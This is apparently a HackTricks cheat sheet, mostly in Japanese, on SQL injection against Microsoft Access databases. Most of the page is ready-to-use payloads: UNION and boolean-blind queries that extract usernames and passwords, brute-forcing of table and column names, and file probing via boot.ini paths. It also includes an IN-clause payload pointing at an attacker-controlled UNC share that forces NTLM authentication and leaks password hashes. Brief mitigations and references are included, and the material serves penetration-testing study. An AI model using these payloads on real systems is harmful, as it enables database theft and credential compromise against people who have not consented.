MS Access SQL Injection
Reading time: 15 minutes
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
オンラインプレイグラウンド
DBの制限
文字列の連結
文字列の連結は & (%26)
および + (%2b)
文字を使用して可能です。
1' UNION SELECT 'web' %2b 'app' FROM table%00
1' UNION SELECT 'web' %26 'app' FROM table%00
コメント
MS Accessにはコメントがありませんが、NULL文字を使ってクエリの最後を削除することが可能なようです:
1' union select 1,2 from table%00
クエリの構文を修正することもできます。
1' UNION SELECT 1,2 FROM table WHERE ''='
スタッククエリ
サポートされていません。
LIMIT
LIMIT
演算子は 実装されていません。ただし、TOP
演算子を使用して最初の N テーブル行に SELECT クエリの結果を制限することは可能です。TOP
は、返される行数を表す整数を引数として受け取ります。
1' UNION SELECT TOP 3 attr FROM table%00
Just like TOP you can use LAST
which will get the rows from the end.
UNION Queries/Sub queries
SQLiでは、通常、他のテーブルから情報を抽出するために新しいクエリを実行したいと思うでしょう。MS Accessでは、サブクエリや追加のクエリではFROM
を指定する必要があります。
したがって、UNION SELECT
やUNION ALL SELECT
、または条件内の括弧で囲まれたSELECT
を実行したい場合は、常に有効なテーブル名を持つFROM
を指定する必要があります。
そのため、有効なテーブル名を知っておく必要があります。
-1' UNION SELECT username,password from users%00
Chaining equals + Substring
warning
これにより、テーブルの名前を知らなくても現在のテーブルの値を抽出することができます。
MS Access は '1'=2='3'='asd'=false
のような 奇妙な構文 を許可します。通常、SQLインジェクションは WHERE
句の中にあるため、これを悪用できます。
MS Access データベースに SQLi があり、1 つの カラム名が username であることを知っている(または推測している)とします。そして、それが抽出したいフィールドです。チェイニングイコール技術を使用したときのウェブアプリの異なる応答を確認し、Mid
関数を使用して部分文字列を取得することで、ブールインジェクション を使用してコンテンツを抽出する可能性があります。
'=(Mid(username,1,3)='adm')='
テーブルの名前とカラムを知っている場合、Mid
、LAST
、およびTOP
の組み合わせを使用して、ブールSQLiを介してすべての情報を漏洩させることができます:
'=(Mid((select last(useranme) from (select top 1 username from usernames)),1,3)='Alf')='
Feel free to check this in the online playground.
テーブル名のブルートフォース
チェイニングイコール技術を使用すると、次のようにテーブル名をブルートフォースすることもできます:
'=(select+top+1+'lala'+from+<table_name>)='
より伝統的な方法を使用することもできます:
-1' AND (SELECT TOP 1 <table_name>)%00
Feel free to check this in the online playground.
- Sqlmapの一般的なテーブル名: https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt
- http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html に別のリストがあります。
カラム名のブルートフォース
現在のカラム名をブルートフォースすることができます。チェイニングイコールトリックを使用して:
'=column_name='
グループ化を使用して:
-1' GROUP BY column_name%00
別のテーブルのカラム名をブルートフォースすることもできます:
'=(SELECT TOP 1 column_name FROM valid_table_name)='
-1' AND (SELECT TOP 1 column_name FROM valid_table_name)%00
データのダンプ
私たちはすでにチェイニングイコール技術 を使用して現在および他のテーブルからデータをダンプする方法について議論しました。しかし、他にも方法があります:
IIF((select mid(last(username),1,1) from (select top 10 username from users))='a',0,'ko')
要約すると、クエリは「if-then」ステートメントを使用して、成功した場合は「200 OK」をトリガーし、そうでない場合は「500 Internal Error」をトリガーします。TOP 10オペレーターを利用することで、最初の10件の結果を選択することが可能です。その後、LASTを使用することで、10番目のタプルのみを考慮できます。その値に対して、MIDオペレーターを使用することで、単純な文字比較を行うことができます。MIDとTOPのインデックスを適切に変更することで、すべての行の「username」フィールドの内容をダンプできます。
時間ベース(ブラインド)トリック
Jet/ACE SQL自体はネイティブの SLEEP()
または WAITFOR
関数を提供しないため、従来の時間ベースのブラインドインジェクションは制限されています。しかし、エンジンに遅いか応答しないネットワークリソースにアクセスさせることで、測定可能な遅延を導入することは可能です。エンジンは結果を返す前にファイルを開こうとするため、HTTPレスポンスタイムは攻撃者が制御するホストへの往復遅延を反映します。
' UNION SELECT 1 FROM SomeTable IN '\\10.10.14.3\doesnotexist\dummy.mdb'--
UNCパスを次のように指定します:
- 高遅延リンクの背後にあるSMB共有
SYN-ACK
の後にTCPハンドシェイクをドロップするホスト- ファイアウォールシンクホール
リモートルックアップによって導入される追加の秒数は、ブール条件のためのアウトオブバンドタイミングオラクルとして使用できます(例:注入された述語が真のときのみ遅いパスを選択)。Microsoftは、リモートデータベースの動作と関連するレジストリキルスイッチをKB5002984で文書化しています。 citeturn1search0
その他の興味深い関数
Mid('admin',1,1)
位置1から長さ1の部分文字列を取得(初期位置は1)LEN('1234')
文字列の長さを取得ASC('A')
文字のASCII値を取得CHR(65)
ASCII値から文字列を取得IIF(1=1,'a','b')
if thenCOUNT(*)
アイテムの数をカウント
テーブルの列挙
こちらから、テーブル名を取得するためのクエリを見ることができます:
select MSysObjects.name
from MSysObjects
where
MSysObjects.type In (1,4,6)
and MSysObjects.name not like '~*'
and MSysObjects.name not like 'MSys*'
order by MSysObjects.name
しかし、MSysObjects
テーブルを読み取るアクセス権がない場合でも、SQLインジェクションを見つけることは非常に一般的です。
ファイルシステムアクセス
ウェブルートディレクトリのフルパス
ウェブルートの絶対パスを知ることは、さらなる攻撃を容易にする可能性があります。アプリケーションエラーが完全に隠されていない場合、存在しないデータベースからデータを選択しようとすることでディレクトリパスが明らかになることがあります。
http://localhost/script.asp?id=1'+ '+UNION+SELECT+1+FROM+FakeDB.FakeTable%00
MS Accessは、ウェブディレクトリのフルパスを含むエラーメッセージで応答します。
ファイル列挙
次の攻撃ベクターは、リモートファイルシステム上のファイルの存在を推測するために使用できます。指定されたファイルが存在する場合、MS Accessはデータベース形式が無効であることを通知するエラーメッセージをトリガーします:
http://localhost/script.asp?id=1'+UNION+SELECT+name+FROM+msysobjects+IN+'\boot.ini'%00
ファイルを列挙する別の方法は、データベース.table項目を指定することです。指定されたファイルが存在する場合、MS Accessはデータベース形式エラーメッセージを表示します。
http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+C:\boot.ini.TableName%00
.mdbファイル名の推測
**データベースファイル名(.mdb)**は、次のクエリで推測できます:
http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00
ここで、name[i]は.mdbファイル名であり、realTableはデータベース内の存在するテーブルです。MS Accessは常にエラーメッセージをトリガーしますが、無効なファイル名と有効な.mdbファイル名を区別することは可能です。
リモートデータベースアクセスとNTLM資格情報の盗難(2023)
Jet 4.0以降、すべてのクエリは、IN '<path>'
句を介して異なる .mdb/.accdb
ファイルにあるテーブルを参照できます:
SELECT first_name FROM Employees IN '\\server\share\hr.accdb';
ユーザー入力がINの後の部分(またはJOIN … IN
/ OPENROWSET
/ OPENDATASOURCE
呼び出しに)連結されると、攻撃者は自分が制御するホストを指すUNCパスを指定できます。エンジンは次のことを行います:
- リモートデータベースを開くためにSMB / HTTPで認証を試みる;
- ウェブサーバーのNTLM資格情報を漏洩させる(強制認証);
- リモートファイルを解析する - 形式が不正または悪意のあるデータベースは、何度もパッチが当てられたJet/ACEメモリ破損バグを引き起こす可能性があります(例:CVE-2021-28455)。
実用的なインジェクションの例:
1' UNION SELECT TOP 1 name
FROM MSysObjects
IN '\\attacker\share\poc.mdb'-- -
影響:
- Net-NTLMv2 ハッシュのアウトオブバンド流出(リレーまたはオフラインクラッキングに使用可能)。
- 新しい Jet/ACE パーサーバグが悪用されると、リモートコード実行の可能性があります。
緩和策(レガシー Classic ASP アプリでも推奨):
HKLM\Software\Microsoft\Jet\4.0\Engines
(および同等の ACE パス)にレジストリ値AllowQueryRemoteTables = 0
を追加します。これにより、Jet/ACE は\\
で始まるリモートパスを拒否します。- ネットワーク境界での SMB/WebDAV のアウトバウンドをブロックします。
IN
句内に入る可能性のあるクエリの任意の部分をサニタイズ/パラメータ化します。
強制認証ベクターは、2023年に Check Point Research によって再検討され、レジストリキーが存在しない場合、完全にパッチが適用された Windows Server でも依然として悪用可能であることが証明されました。 citeturn0search0
.mdb パスワードクラッカー
Access PassView は、Microsoft Access 95/97/2000/XP または Jet Database Engine 3.0/4.0 のメインデータベースパスワードを回復するために使用できる無料のユーティリティです。
参考文献
- http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
- Microsoft KB5002984 – Jet/ACE を構成してリモートテーブルをブロックする
- Check Point Research – Microsoft Access リンクテーブルを悪用した NTLM 強制認証 (2023)
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。